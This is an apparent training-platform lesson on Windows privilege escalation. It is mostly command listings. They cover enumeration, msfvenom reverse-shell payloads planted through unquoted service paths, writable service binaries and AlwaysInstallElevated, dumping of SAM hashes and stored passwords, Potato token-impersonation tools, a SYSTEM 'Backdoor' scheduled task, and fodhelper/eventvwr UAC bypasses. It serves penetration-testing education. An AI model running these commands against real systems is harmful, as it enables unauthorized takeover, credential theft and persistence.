Windows PrivEsc

intermediate1h 30mWriteup

Practice Windows privilege escalation

Learning Objectives

  • Service exploitation
  • Registry attacks
  • Token impersonation
  • DLL hijacking

Windows Privilege Escalation covers techniques to elevate from a standard user to Administrator or SYSTEM on Windows machines. From service misconfigurations to token manipulation, these skills are essential for Windows penetration testing.

Windows privilege escalation differs significantly from Linux. Instead of SUID binaries, you'll exploit services, tokens, and the registry. SYSTEM is the highest privilege level - even above Administrator!

Initial Enumeration

bash
1606070;"># System Information
2systeminfo
3hostname
4whoami /all
5 
6606070;"># User and Group Info
7net user
8net user username
9net localgroup
10net localgroup Administrators
11 
12606070;"># Network Information
13ipconfig /all
14netstat -ano
15arp -a
16 
17606070;"># Installed Software
18wmic product get name,version
19reg query HKLM\SOFTWARE
20 
21606070;"># Running Services
22sc query
23wmic service get name,displayname,pathname,startmode
24 
25606070;"># Scheduled Tasks
26schtasks /query /fo LIST /v

WinPEAS

WinPEAS automates Windows enumeration. Upload and run it for comprehensive privilege escalation checks with color-coded output.

Service Exploitation

Unquoted Service Paths

bash
1606070;"># Find unquoted paths
2wmic service get name,displayname,pathname,startmode | findstr /i 606070;">#a5d6ff;">"auto" | findstr /i /v "c:\windows\\" | findstr /i /v '"'
3 
4606070;"># Example vulnerable path:
5606070;"># C:\Program Files\My Program\service.exe
6 
7606070;"># Windows tries to execute in order:
8606070;"># C:\Program.exe
9606070;"># C:\Program Files\My.exe
10606070;"># C:\Program Files\My Program\service.exe
11 
12606070;"># If we can write to C:\Program Files\:
13msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=4444 -f exe > My.exe
14copy My.exe 606070;">#a5d6ff;">"C:\Program Files\My.exe"
15sc stop vulnerable_service
16sc start vulnerable_service

Insecure Service Permissions

bash
1606070;"># Check service permissions with accesschk (SysInternals)
2accesschk.exe -uwcqv 606070;">#a5d6ff;">"Authenticated Users" * /accepteula
3accesschk.exe -uwcqv 606070;">#a5d6ff;">"Users" * /accepteula
4 
5606070;"># Check specific service
6sc qc vulnerable_service
7 
8606070;"># If SERVICE_CHANGE_CONFIG is allowed:
9sc config vulnerable_service binpath= 606070;">#a5d6ff;">"C:\Users\Public\shell.exe"
10sc stop vulnerable_service
11sc start vulnerable_service

Weak Service Binary Permissions

bash
1606070;"># Check if service binary is writable
2icacls 606070;">#a5d6ff;">"C:\Program Files\Vulnerable\service.exe"
3 
4606070;"># If writable:
5msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=4444 -f exe > service.exe
6copy service.exe 606070;">#a5d6ff;">"C:\Program Files\Vulnerable\service.exe" /Y
7sc stop vulnerable_service
8sc start vulnerable_service

Registry Exploitation

bash
1606070;"># AutoRun programs
2reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
3reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
4 
5606070;"># Check permissions
6accesschk.exe -wvu 606070;">#a5d6ff;">"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
7 
8606070;"># AlwaysInstallElevated
9606070;"># If both keys = 1, MSI packages install as SYSTEM!
10reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
11reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
12 
13606070;"># Exploit AlwaysInstallElevated
14msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=4444 -f msi > shell.msi
15msiexec /quiet /qn /i shell.msi
AlwaysInstallElevated is a significant finding! It allows any user to install MSI packages with SYSTEM privileges.

Password Mining

bash
1606070;"># Saved credentials
2cmdkey /list
3 
4606070;"># If credentials saved:
5runas /savecred /user:admin cmd.exe
6 
7606070;"># Registry passwords
8reg query HKLM /f password /t REG_SZ /s
9reg query HKCU /f password /t REG_SZ /s
10 
11606070;"># Autologon credentials
12reg query 606070;">#a5d6ff;">"HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
13 
14606070;"># SAM and SYSTEM (if accessible)
15reg save HKLM\SAM sam.bak
16reg save HKLM\SYSTEM system.bak
17606070;"># Extract hashes with secretsdump.py or mimikatz
18 
19606070;"># Unattend files
20findstr /si password *.xml *.ini *.txt
21type C:\Windows\Panther\Unattend.xml
22type C:\Windows\Panther\Unattend\Unattend.xml

Token Impersonation

bash
1606070;"># Check privileges
2whoami /priv
3 
4606070;"># Exploitable privileges:
5606070;"># SeImpersonatePrivilege - PrintSpoofer, JuicyPotato
6606070;"># SeAssignPrimaryTokenPrivilege - Token manipulation
7606070;"># SeBackupPrivilege - Backup SAM/SYSTEM
8606070;"># SeRestorePrivilege - Write to any file
9606070;"># SeTakeOwnershipPrivilege - Take ownership of files
10 
11606070;"># SeImpersonatePrivilege exploitation
12606070;"># PrintSpoofer (Windows 10/Server 2016+)
13PrintSpoofer.exe -i -c cmd
14 
15606070;"># JuicyPotato (older Windows)
16JuicyPotato.exe -l 1337 -p cmd.exe -t * -c {CLSID}
17 
18606070;"># GodPotato (newer systems)
19GodPotato.exe -cmd 606070;">#a5d6ff;">"cmd /c whoami"

Service Accounts

IIS AppPool, MSSQL, and other service accounts typically have SeImpersonatePrivilege. If you compromise these, Potato attacks give you SYSTEM!

Scheduled Tasks

bash
1606070;"># List scheduled tasks
2schtasks /query /fo LIST /v
3 
4606070;"># Look for:
5606070;"># - Tasks running as SYSTEM
6606070;"># - Scripts/binaries that are writable
7 
8606070;"># Check task binary permissions
9icacls 606070;">#a5d6ff;">"C:\Path\To\Task\Binary.exe"
10 
11606070;"># If writable, replace with malicious binary
12606070;"># Task will execute your payload as SYSTEM
13 
14606070;"># Create scheduled task (if admin)
15schtasks /create /sc MINUTE /mo 1 /tn 606070;">#a5d6ff;">"Backdoor" /tr "C:\Users\Public\shell.exe" /ru SYSTEM

UAC Bypass

bash
1606070;"># Check UAC level
2reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
3 
4606070;"># Values:
5606070;"># EnableLUA = 1 (UAC enabled)
6606070;"># ConsentPromptBehaviorAdmin:
7606070;">#   0 = Elevate without prompting
8606070;">#   5 = Prompt for consent
9 
10606070;"># UAC bypass techniques (when already admin but blocked by UAC):
11 
12606070;"># Fodhelper bypass
13reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /d 606070;">#a5d6ff;">"cmd.exe" /f
14reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /f
15fodhelper.exe
16 
17606070;"># Eventvwr bypass
18reg add HKCU\Software\Classes\mscfile\Shell\Open\command /d 606070;">#a5d6ff;">"cmd.exe" /f
19eventvwr.exe
20 
21606070;"># Clean up
22reg delete HKCU\Software\Classes\ms-settings /f

Essential Tools

1606070;"># Enumeration
2606070;"># - WinPEAS: Automated enumeration
3606070;"># - Seatbelt: Detailed security checks
4606070;"># - PowerUp: PowerShell privesc checker
5606070;"># - accesschk.exe: Permission checking
6 
7606070;"># Exploitation
8606070;"># - PrintSpoofer: SeImpersonate exploitation
9606070;"># - JuicyPotato: Older SeImpersonate exploitation
10606070;"># - GodPotato: Modern potato attack
11606070;"># - mimikatz: Credential extraction
12 
13606070;"># PowerShell
14Import-Module PowerUp.ps1
15Invoke-AllChecks
16 
17606070;"># Metasploit
18use post/multi/recon/local_exploit_suggester

Knowledge Check

Quick Quiz
Question 1 of 3

What makes unquoted service paths exploitable?

Key Takeaways

  • Service misconfigurations are the most common Windows privesc vector
  • Unquoted service paths are easy to exploit if you can write to parent directories
  • SeImpersonatePrivilege = Potato attacks = SYSTEM
  • Always check for saved credentials with cmdkey /list
  • AlwaysInstallElevated is a critical finding
  • Run WinPEAS for comprehensive automated enumeration